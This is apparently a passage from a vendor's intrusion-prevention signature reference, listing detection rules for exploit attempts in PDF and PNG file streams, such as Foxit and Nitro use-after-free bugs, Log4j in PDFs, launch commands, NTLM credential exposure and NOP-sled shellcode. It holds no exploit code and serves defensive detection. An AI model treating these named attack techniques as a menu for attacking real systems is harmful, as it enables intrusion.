About this situation: An attempt to exploit a vulnerability in Foxit Software PDF Editor detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Foxit Reader, CVE2021, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1411-5242
Last changed: sgpkg-ips-1411-5242
Vulnerability: Foxit-Reader-And-Editor-Annotation-CVE-2021-34833-Use-After-Free
Description:
Back to top

File-PDF_Foxit-Reader-And-Phantompdf-Associated-File-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Foxit Software Foxit Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Foxit Reader, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1069-5242
Last changed: sgpkg-ips-1069-5242
Vulnerability: Foxit-Reader-And-Phantompdf-Associated-File-Type-Confusion
Description:
Back to top

File-PDF_Foxit-Reader-And-Phantompdf-Choice-Field-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Foxit Software Foxit Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Foxit Reader, PhantomPDF, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1316-5242
Last changed: sgpkg-ips-1316-5242
Vulnerability: Foxit-Reader-And-Phantompdf-Choice-Field-Use-After-Free
Description:
Back to top

File-PDF_Foxit-Reader-And-Phantompdf-Xfa-Xdpcontent-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Foxit Software Foxit Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Foxit Reader, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1127-5242
Last changed: sgpkg-ips-1127-5242
Vulnerability: Foxit-Reader-And-Phantompdf-Xfa-Xdpcontent-Information-Disclosure
Description:
Back to top

File-PDF_Foxit-Reader-And-Phantonpdf-Xfa-Gotourl-Command-Injection

About this situation: An attempt to exploit a vulnerability in Foxit Software Foxit Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Foxit Reader, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-989-5242
Last changed: sgpkg-ips-991-5242
Vulnerability: Foxit-Reader-And-Phantonpdf-Xfa-Gotourl-Command-Injection
Description:
Back to top

File-PDF_Foxit-Reader-Annotation-Delay-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Foxit Software Foxit Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Foxit Reader, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1120-5242
Last changed: sgpkg-ips-1120-5242
Vulnerability: Foxit-Reader-Annotation-Delay-Use-After-Free
Description:
Back to top

File-PDF_Foxit-Reader-Annotations-Bordereffectintensity-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Foxit Software Foxit Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Foxit Reader, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1089-5242
Last changed: sgpkg-ips-1089-5242
Vulnerability: Foxit-Reader-Annotations-Bordereffectintensity-Use-After-Free
Description:
Back to top

File-PDF_Foxit-Reader-Annotations-NoteIcon-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Foxit Software Foxit Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Foxit Reader, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1096-5242
Last changed: sgpkg-ips-1096-5242
Vulnerability: Foxit-Reader-Annotations-NoteIcon-Use-After-Free
Description:
Back to top

File-PDF_Foxit-Reader-Annotations-Point-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Foxit Software Foxit Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Foxit Reader, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1088-5242
Last changed: sgpkg-ips-1088-5242
Vulnerability: Foxit-Reader-Annotations-Point-Use-After-Free
Description:
Back to top

File-PDF_Foxit-Reader-Gotor-Action-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Foxit Software Foxit Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Foxit Reader, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-782-5211
Last changed: sgpkg-ips-782-5211
Vulnerability: Foxit-Reader-Gotor-Action-Stack-Buffer-Overflow
Description:
Back to top

File-PDF_Foxit-Reader-JavaScript-CreateTemplate-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Foxit Software Foxit Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Foxit Reader, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1096-5242
Last changed: sgpkg-ips-1096-5242
Vulnerability: Foxit-Reader-JavaScript-CreateTemplate-Use-After-Free
Description:
Back to top

File-PDF_Foxit-Reader-JavaScript-getPageNumWords-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Foxit Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Foxit Reader, PhantomPDF, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1142-5242
Last changed: sgpkg-ips-1142-5242
Vulnerability: Foxit-Reader-JavaScript-getPageNumWords-Use-After-Free
Description:
Back to top

File-PDF_Foxit-Reader-JavaScript-MailForm-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Foxit Software Foxit Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Foxit Reader, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1096-5242
Last changed: sgpkg-ips-1096-5242
Vulnerability: Foxit-Reader-JavaScript-MailForm-Use-After-Free
Description:
Back to top

File-PDF_Foxit-Reader-JavaScript-popUpMenu-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Foxit Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Foxit Reader, PhantomPDF, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1153-5242
Last changed: sgpkg-ips-1729-5242
Vulnerability: Foxit-Reader-JavaScript-popUpMenu-Use-After-Free
Description:
Back to top

File-PDF_Foxit-Reader-PDF-Parsing-Shading-Pattern-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Foxit Software Foxit Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Foxit Reader, PhantomPDF, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1120-5242
Last changed: sgpkg-ips-1120-5242
Vulnerability: Foxit-Reader-PDF-Parsing-Shading-Pattern-Integer-Overflow
Description:
Back to top

File-PDF_HTTP-Transfer-Over-Nonstandard-Port

About this situation: A PDF file was seen in a HTTP connection that uses a nonstandard port
Context: PDF File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-604-5211
Description:
Back to top

File-PDF_JavaScript-Eval-Obfuscation-Method

About this situation: Detected an obfuscated JavaScript
Context: PDF File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-1227-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-PDF_JavaScript-In-PDF

About this situation: Javascript In PDF
Context: PDF File Stream
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-415-4219
Vulnerability: JavaScript-In-PDF
Description:
Back to top

File-PDF_JavaScript-Packed-Obfuscation-Method

About this situation: Detected an obfuscated script
Context: PDF File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-443-4219
Last changed: sgpkg-ips-443-4219
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-PDF_JavaScript-Suspicious-Variable-Name

About this situation: Suspicious JavaScript variable name in PDF file
Context: PDF File Stream
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-445-4219
Last changed: sgpkg-ips-446-4219
Vulnerability: JavaScript-In-PDF
Description:
Back to top

File-PDF_JavaScript-Unescape-Obfuscation-Method-2

About this situation: Detected an obfuscated JavaScript
Context: PDF File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-445-4219
Last changed: sgpkg-ips-445-4219
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-PDF_JavaScript-With-Open-Action-In-PDF

About this situation: Automatically runnable JavaScript in PDF file
Context: PDF File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1607-5242
Vulnerability: JavaScript-In-PDF
Description:
Back to top

File-PDF_JavaScript-With-Unescape-In-PDF

About this situation: Suspicious JavaScript in PDF file
Context: PDF File Stream
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-445-4219
Vulnerability: JavaScript-In-PDF
Description:
Back to top

File-PDF_Launch-Command-In-PDF

About this situation: Launch command in PDF
Context: PDF File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1347-5242
Vulnerability: Launch-Command-In-PDF
Description:
Back to top

File-PDF_Log4j-Remote-Code-Execution

About this situation: A PDF file with log4j exploit was detected
Context: PDF File Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Apache Software Foundation Log4j, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1419-5242
Last changed: sgpkg-ips-1419-5242
Vulnerability: Log4j-Remote-Code-Execution
Description:
Back to top

File-PDF_Malicious-JavaScript-In-PDF

About this situation: A PDF file with malicious JavaScript detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-443-4219
Last changed: sgpkg-ips-443-4219
Vulnerability: Malicious-JavaScript-In-PDF
Description:
Back to top

File-PDF_Malicious-JavaScript-In-PDF-2

About this situation: A PDF file with malicious JavaScript detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-443-4219
Last changed: sgpkg-ips-444-4219
Vulnerability: Malicious-JavaScript-In-PDF
Description:
Back to top

File-PDF_Microsoft-Edge-CVE-2017-0023

About this situation: An attempt to exploit a vulnerability in Microsoft Edge
Context: PDF File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2017-03, CVE2017, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-CVE-2017-0023
Description:
Back to top

File-PDF_Microsoft-Edge-PDF-Remote-Code-Execution-CVE-2018-8464

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: PDF File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-09, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1101-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-PDF-Remote-Code-Execution-CVE-2018-8464
Description:
Back to top

File-PDF_Microsoft-Windows-PDF-Library-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: PDF File Stream
Severity: 7
Tags: Windows 2012, Windows 8.1, Windows 10.0, Windows 10.1511, Any Hardware, Windows Server, Microsoft Edge, MS2016-06, CVE2016, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-774-5211
Last changed: sgpkg-ips-1283-5242
Vulnerability: Windows-PDF-Remote-Code-Execution-CVE-2016-3203
Description:
Back to top

File-PDF_Microsoft-Windows-PDF-Library-CVE-2016-0117-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: PDF File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-04, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-748-5211
Last changed: sgpkg-ips-748-5211
Vulnerability: Microsoft-Windows-PDF-Library-CVE-2016-0117-Code-Execution
Description:
Back to top

File-PDF_Microsoft-Windows-PDF-Library-CVE-2016-3319-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: PDF File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2016-09, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-797-5211
Last changed: sgpkg-ips-797-5211
Vulnerability: Microsoft-Windows-PDF-Library-CVE-2016-3319-Memory-Corruption
Description:
Back to top

File-PDF_Microsoft-Windows-PDF-Library-Heap-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: PDF File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-992-5242
Last changed: sgpkg-ips-992-5242
Vulnerability: Microsoft-Windows-PDF-Library-Heap-Based-Buffer-Overflow
Description:
Back to top

File-PDF_Microsoft-Windows-PDF-Library-PostScript-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: PDF File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-09, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-805-5242
Last changed: sgpkg-ips-805-5242
Vulnerability: Microsoft-Windows-PDF-Library-PostScript-Information-Disclosure
Description:
Back to top

File-PDF_Microsoft-Word-Remote-Code-Execution-Vulnerability-CVE-2024-21379

About this situation: An attempt to exploit a vulnerability in Microsoft Word detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Word, MS2024-02, CVE2024, Any Operating System not specific, Microsoft Word not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1691-5242
Last changed: sgpkg-ips-1691-5242
Vulnerability: Microsoft-Word-Remote-Code-Execution-Vulnerability-CVE-2024-21379
Description:
Back to top

File-PDF_Mozilla-PDFjs-Fontfaceobject-Arbitrary-JavaScript-Code-Execution

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation PDF.js detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1744-5242
Last changed: sgpkg-ips-1744-5242
Vulnerability: Mozilla-PDFjs-Fontfaceobject-Arbitrary-JavaScript-Code-Execution
Description:
Back to top

File-PDF_Multiple-Stream-Filters-Obfuscation

About this situation: Usage of multiple stream filters detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-459-5211
Last changed: sgpkg-ips-459-5211
Vulnerability: PDF-Multiple-Stream-Filters-Obfuscation
Description:
Back to top

File-PDF_Multiple-Vendor-PDF-Reader-Catlog-Handling

About this situation: An attempt to exploit a vulnerability in PDF readers from multiple vendors detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple Preview, Adobe Reader, CVE2007, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Multiple-Vendor-PDF-Reader-Catlog-Handling
Description:
Back to top

File-PDF_Negative-Image-Dimension

About this situation: An invalid image object in a PDF
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1389-5242
Last changed: sgpkg-ips-1389-5242
Vulnerability: Adobe-Acrobat-Dc-Smask-Image-Xobject-Height-Out-Of-Bounds-Write
Description:
Back to top

File-PDF_Nitro-Pro-PDF-Iccbased-ColorSpace-Stroke-Color-Heap-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Nitro PDF Nitro Pro detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Nitro Pro PDF, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1298-5242
Last changed: sgpkg-ips-1300-5242
Vulnerability: Nitro-Pro-PDF-Iccbased-ColorSpace-Stroke-Color-Heap-Based-Buffer-Overflow
Description:
Back to top

File-PDF_Nitro-Pro-PDF-Indexed-ColorSpace-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Nitro Pro PDF detected
Context: PDF File Stream
Severity: 7
Tags: Windows, Any Hardware, Nitro Pro PDF, CVE2020, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1294-5242
Last changed: sgpkg-ips-1294-5242
Vulnerability: Nitro-Pro-PDF-Indexed-ColorSpace-Integer-Overflow
Description:
Back to top

File-PDF_Nitro-Pro-PDF-Nested-Pages-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Nitro PDF Nitro Pro detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Nitro Pro PDF, CVE2020, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1260-5242
Last changed: sgpkg-ips-1260-5242
Vulnerability: Nitro-Pro-PDF-Nested-Pages-Use-After-Free
Description:
Back to top

File-PDF_Nitro-Pro-PDF-Object-Stream-Parsing-Number-Of-Objects-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Nitro PDF Nitro Pro detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Nitro Pro PDF, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1289-5242
Last changed: sgpkg-ips-1289-5242
Vulnerability: Nitro-Pro-PDF-Object-Stream-Parsing-Number-Of-Objects-Integer-Overflow
Description:
Back to top

File-PDF_Nitro-Pro-PDF-Pattern-Object-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Nitro PDF Nitro Pro detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Nitro Pro PDF, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1261-5242
Last changed: sgpkg-ips-1261-5242
Vulnerability: Nitro-Pro-PDF-Pattern-Object-Integer-Overflow
Description:
Back to top

File-PDF_NTLM-Credentials-Exposure

About this situation: A PDF file with possible NTLM credential exposure functionality detected
Context: PDF File Stream
Severity: 2
Tags: Windows, Any Hardware, CVE2018, Windows not specific, Potential Disclosure
First detected in: sgpkg-ips-1068-5242
Last changed: sgpkg-ips-1068-5242
Vulnerability: NTLM-Credentials-Exposure
Description:
Back to top

File-PDF_OLE-Header-In-PDF-File

About this situation: An OLE file header detected in a PDF file
Context: PDF File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-416-4219
Vulnerability: OLE-Header-In-PDF-File
Description:
Back to top

File-PDF_Pdfium-Heap-Buffer-Overflow-Vulnerability

About this situation: An attempt to exploit a vulnerability in Pdfium detected
Context: PDF File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2021, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1393-5242
Last changed: sgpkg-ips-1393-5242
Vulnerability: Pdfium-Heap-Buffer-Overflow-Vulnerability
Description:
Back to top

File-PDF_Shared-Variables

About this situation: This fingerprint sets shared variables
Context: PDF File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1552-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

File-PDF_Sophos-Anti-Virus-PDF-Handling-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Sophos Threat Detection Engine detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Sophos Anti-Virus, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-492-5211
Vulnerability: Sophos-Anti-Virus-PDF-Handling-Stack-Buffer-Overflow
Description:
Back to top

File-PDF_Suspected-Jaff-Ransomware-PDF

About this situation: Suspicious JavaScript content in PDF file
Context: PDF File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-930-5242
Last changed: sgpkg-ips-930-5242
Vulnerability: Jaff-Ransomware
Description:
Back to top

File-PDF_Suspected-TrickBot-Trojan-PDF

About this situation: Suspicious JavaScript content in PDF file
Context: PDF File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-930-5242
Last changed: sgpkg-ips-930-5242
Vulnerability: TrickBot-Trojan
Description:
Back to top

File-PDF_Suspicious-File

About this situation: A suspicious PDF file detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-498-5211
Last changed: sgpkg-ips-1788-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

File-PDF_Suspicious-HTTP-Transfer-Over-Nonstandard-Port

About this situation: A PDF file was seen in a HTTP connection that uses a nonstandard port
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-866-5242
Last changed: sgpkg-ips-866-5242
Description:
Back to top

File-PDF_Windows-MSHTML-Platform-Spoofing-Vulnerability-CVE-2024-43573

About this situation: An attempt to exploit a vulnerability in Windows MSHTML Platform detected
Context: PDF File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, Microsoft Edge, MS2024-10, CVE2024, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1787-5242
Last changed: sgpkg-ips-1787-5242
Vulnerability: Windows-MSHTML-Platform-Spoofing-Vulnerability-CVE-2024-43573
Description:
Back to top

File-PDF_Windows-PDF-Information-Disclosure-CVE-2016-3201

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: PDF File Stream
Severity: 7
Tags: Windows 2012, Windows 8.1, Windows 10.0, Windows 10.1511, Any Hardware, MS2016-06, CVE2016, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-770-5211
Last changed: sgpkg-ips-770-5211
Vulnerability: Windows-PDF-Information-Disclosure-CVE-2016-3201
Description:
Back to top

File-PDF_Windows-PDF-Information-Disclosure-CVE-2016-3215

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: PDF File Stream
Severity: 7
Tags: Windows 2012, Windows 8.1, Windows 10.1511, Any Hardware, MS2016-06, CVE2016, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-770-5211
Last changed: sgpkg-ips-770-5211
Vulnerability: Windows-PDF-Information-Disclosure-CVE-2016-3215
Description:
Back to top

File-PDF_Windows-PDF-Library-CVE-2016-3370

About this situation: An attempt to exploit a vulnerability in Windows detected
Context: PDF File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-09, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-1788-5242
Vulnerability: Windows-PDF-Library-CVE-2016-3370
Description:
Back to top

File-PDF_Windows-PDF-Remote-Code-Execution-CVE-2016-3203

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: PDF File Stream
Severity: 7
Tags: Windows 2012, Windows 8.1, Windows 10.0, Windows 10.1511, Any Hardware, Windows Server, Microsoft Edge, MS2016-06, CVE2016, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-770-5211
Last changed: sgpkg-ips-770-5211
Vulnerability: Windows-PDF-Remote-Code-Execution-CVE-2016-3203
Description:
Back to top

File-PDF_Windows-ShellExecute-And-IE7-Url-Handling-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: PDF File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Any Hardware, Netscape, Mozilla Firefox, Adobe Reader, Microsoft Outlook, mIRC, Adobe Acrobat, Microsoft Outlook Express, MS2007-11, CVE2007, Windows XP not specific, Windows 2003 not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-581-5211
Vulnerability: Microsoft-Windows-ShellExecute-And-IE7-Url-Handling-Code-Execution
Description:
Back to top

File-PDF_x86-X41nop-Shellcode

About this situation: Shellcode x41 nop detected
Context: PDF File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-414-4219
Vulnerability: Shellcode-Encoder
Description:
Back to top

File-PDF_x86-X90nop-Shellcode

About this situation: Shellcode x90 nop detected
Context: PDF File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-414-4219
Vulnerability: Shellcode-Encoder
Description:
Back to top

File-PDF_Xpdf-Splash-Drawimage-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Glyph & Cog Xpdf detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Glyph & Cog Xpdf, CVE2009, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Xpdf-Splash-Drawimage-Integer-Overflow
Description:
Back to top

File-PNG_Adobe-Photoshop-PNG-Image-Processing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems Photoshop CS6 detected
Context: PNG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Photoshop, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-1845-5242
Vulnerability: Adobe-Photoshop-PNG-Image-Processing-Buffer-Overflow
Description:
Back to top

File-PNG_Adobe-Products-PNG-File-Handling-Stack-Buffer-Overflow

About this situation: Attempt to exploit stack buffer overflow vulnerability in Adobe Photoshop detected
Context: PNG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Photoshop, Adobe Photoshop Elements, CVE2007, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1772-5242
Vulnerability: Adobe-Products-PNG-File-Handling-Stack-Buffer-Overflow
Description:
Back to top

File-PNG_Adobe-Reader-Security-Bypass-CVE-2013-0624

About this situation: Attempt to exploit vulnerability in Adobe Reader
Context: PNG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2013, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-504-5211
Last changed: sgpkg-ips-504-5211
Vulnerability: Adobe-Reader-Security-Bypass-CVE-2013-0624
Description:
Back to top

File-PNG_Conflicting-Content-Type-Text

About this situation: Detected conflicting Content-Type header
Context: PNG File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Anomalies, Protocol Violations
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-566-5211
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-PNG_Conflicting-Content-Type-Text-HTML

About this situation: Detected conflicting Content-Type header
Context: PNG File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Anomalies, Protocol Violations
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-566-5211
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-PNG_Conflicting-Content-Type-Text-Plain

